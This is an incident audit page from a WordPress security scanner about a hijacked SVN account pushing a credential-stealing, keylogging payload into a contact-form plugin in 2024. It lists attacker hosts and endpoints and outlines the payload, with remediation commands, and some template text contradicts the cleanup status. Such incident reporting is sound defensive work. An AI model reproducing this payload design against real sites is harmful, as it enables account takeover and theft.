WP Beacon

← All audits

Audit #20 Cleaned

Contact Form Multi-Step Addon · 300 installs · baseline trunk@r3071804 → head trunk@r3106511 · suspect committer themerex · by beacon-scan-skill (backfill from Wordfence 2024-06-24 advisory) · closed 1y ago

Actor: June 2024 wp.org credential-stuffing wave (operator unattributed)
Show full summary

Confirmed malicious supply-chain compromise of themerex SVN account, recovered by the legitimate maintainer. Between 2024-06-23 22:47 UTC and 2024-06-24 04:10 UTC the themerex account was used to push two malicious "Upgrade" commits (r3106373 + r3106511) to the trunk, injecting the canonical June 2024 payload into trx-contact-form-7-multi-step-addon.php. The wp.org Plugin Review Team (frantorres) reverted at r3106781 + r3106787 on 2024-06-24 12:09–12:25 UTC. Unlike the other 4 plugins in the wave, this one was NOT closed by wp.org — the legitimate themerex maintainer regained control and shipped a clean 1.0.8 - security update (r3145379) on 2024-09-02, with continued maintenance through 1.0.10 (2025-03-18). The plugin remains active on wp.org today. Payload identical to blaze-widget: PHP admin user creation (PluginAUTH, JSON POST to 94.156.79.8/AddSites), cross-CMS recon (PrestaShop/Drupal/Symfony to /CMSUsers), and JS keylogger via hex-escaped eval to 94.156.79.8/sc-top.js + hostpdf.co/pinche.php. Tags 1.0.6, 1.0.7, 1.0.8, 1.0.10 visible today — 1.0.6 and 1.0.7 are likely PRT cleanup or pre-malicious tag re-creations; 1.0.8 and onwards are the legitimate themerex security recovery.

Cleanup published — updates flowing through wp.org again

The plugin has been remediated. This audit is retained as a public record of the incident and the IOCs.

If you run contact-form-7-multi-step-addon on your site

Verify your install matches the wp.org canonical version:

wp plugin verify-checksums contact-form-7-multi-step-addon

A patched build isn't yet published for this audit. Check the security advisories index or remove the plugin until one is available.

Or remove the plugin entirely:

wp plugin deactivate contact-form-7-multi-step-addon
wp plugin delete contact-form-7-multi-step-addon

If you're the plugin author

Cleanup steps to clear this label have not yet been documented for this audit. Contact the investigator listed above.

✓ Cleanup confirmed and audit closed.

Plugins under the same committer's SVN access

themerex holds push access to 2 plugins totalling 700k+ active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

Contact Form Multi-Step Addon — patched / closed audit
300
Solid Security – Password, Two Factor Authentication, and Brute Force Protection — clean code, same SVN account (latent risk)
700k+
Report body is empty.

Everything in this audit is reproducible from the links cited above: SVN log, RDAP records, GitHub repositories, wp.org forum threads, and any live endpoints. Full WP Beacon scan logs and any associated zip artifacts are available on request from the investigator.